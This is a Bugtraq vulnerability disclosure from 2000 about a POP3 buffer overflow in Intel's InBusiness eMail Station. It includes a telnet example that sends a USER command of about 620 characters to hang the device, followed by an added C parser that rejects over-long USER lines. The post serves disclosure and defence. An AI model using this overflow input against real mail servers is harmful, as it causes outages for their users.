Bugtraq mailing list archives

DoS in Intel corporation 'InBusiness eMail Station'


From: Knud Erik Højgaard - CyberCity Support <knud () CYBERCITY DK>
Date: Fri, 20 Oct 2000 14:05:52 +0200

Intel corporation 'InBusiness eMail Station' firmware version 1.04.87
(latest) Denial of service vulnerability.

Vendor notification date: 20/10-2000
Public notification date: 20/10-2000

Problem: I found a buffer overflow in the Intel InBusiness eMail Station,
which can enable an attacker to execute a denial of service attack against it.

Disclaimer: For educational purposes only.

Example:
[foo@bar]$ telnet mailstation 110
Trying mailstation...
Connected to mailstation.
Escape character is '^]'.
+OK Pop server at mailstation starting. <2831812.972049732@mail>
user [buffer]

where [buffer] is approx. 620 chars of your own choice. (Tried A and %, expect
all to work.)

Symptoms: The box (a nice little piece of hardware with built-in hard drive
and all) will stop responding, and needs a power cycle to restore function.

Reason for posting same date as vendor notification: Intel was contacted
and informed of the bug, and all they had to say was "You're using it in a
way it's not supposed to be used" (I told them it was on a leased line) - in
their opinion it doesn't matter since it's possible to connect a modem to it,
and use it for retrieving mail and distributing it locally.


Sincerely (and a big thanks to Intel for not caring about product security
at all)

Knud Erik Højgaard <kain () perker dk>
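The following is an added example, not part of the original post and not Intel's firmware code: a bounded parser for the POP3 USER command that rejects an over-long line such as the one described above instead of copying it into a fixed buffer. It assumes the flaw is an unchecked copy of the USER argument (the post says only "buffer overflow"); the function and constant names are hypothetical, and the limits are the 40-character argument length from RFC 1939 and the 255-octet command line from RFC 2449.

```c
#include <ctype.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define POP3_MAX_LINE 255 /* RFC 2449: whole command line, CRLF included */
#define POP3_MAX_ARG   40 /* RFC 1939: each argument is at most 40 chars */

enum pop3_rc { POP3_OK = 0, POP3_ERR_TOO_LONG, POP3_ERR_SYNTAX };

/* Hypothetical helper: parse one received "USER <name>" line.
 * line/len is raw network input and is not assumed NUL-terminated.
 * On POP3_OK, user holds the NUL-terminated mailbox name. */
enum pop3_rc pop3_parse_user(const char *line, size_t len,
                             char *user, size_t user_sz)
{
    static const char kw[] = "USER";
    /* Reject oversized input before any copy into a fixed buffer. */
    if (len > POP3_MAX_LINE)
        return POP3_ERR_TOO_LONG;
    while (len > 0 && (line[len - 1] == '\n' || line[len - 1] == '\r'))
        len--;                          /* strip the CRLF terminator */
    /* Need keyword, one space and at least one argument byte. */
    if (len < 6 || line[4] != ' ')
        return POP3_ERR_SYNTAX;
    for (size_t i = 0; i < 4; i++)      /* keyword is case-insensitive */
        if (toupper((unsigned char)line[i]) != kw[i])
            return POP3_ERR_SYNTAX;
    const char *arg = line + 5;
    size_t arg_len = len - 5;
    /* Check both the protocol limit and the real destination size. */
    if (arg_len > POP3_MAX_ARG || arg_len >= user_sz)
        return POP3_ERR_TOO_LONG;
    for (size_t i = 0; i < arg_len; i++) /* printable ASCII, no spaces */
        if (arg[i] <= ' ' || arg[i] > '~')
            return POP3_ERR_SYNTAX;
    memcpy(user, arg, arg_len);
    user[arg_len] = '\0';
    return POP3_OK;
}

int main(void)
{
    char big[5 + 620 + 2], out[POP3_MAX_ARG + 1];
    memcpy(big, "USER ", 5);            /* constructed sample input */
    memset(big + 5, 'A', 620);
    memcpy(big + 625, "\r\n", 2);
    printf("620-char USER -> rc=%d\n",
           pop3_parse_user(big, sizeof big, out, sizeof out));
    return 0;
}
```

A server using a check like this answers the over-long line with `-ERR` and keeps the session state intact, which also gives a log point for detecting the probe.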

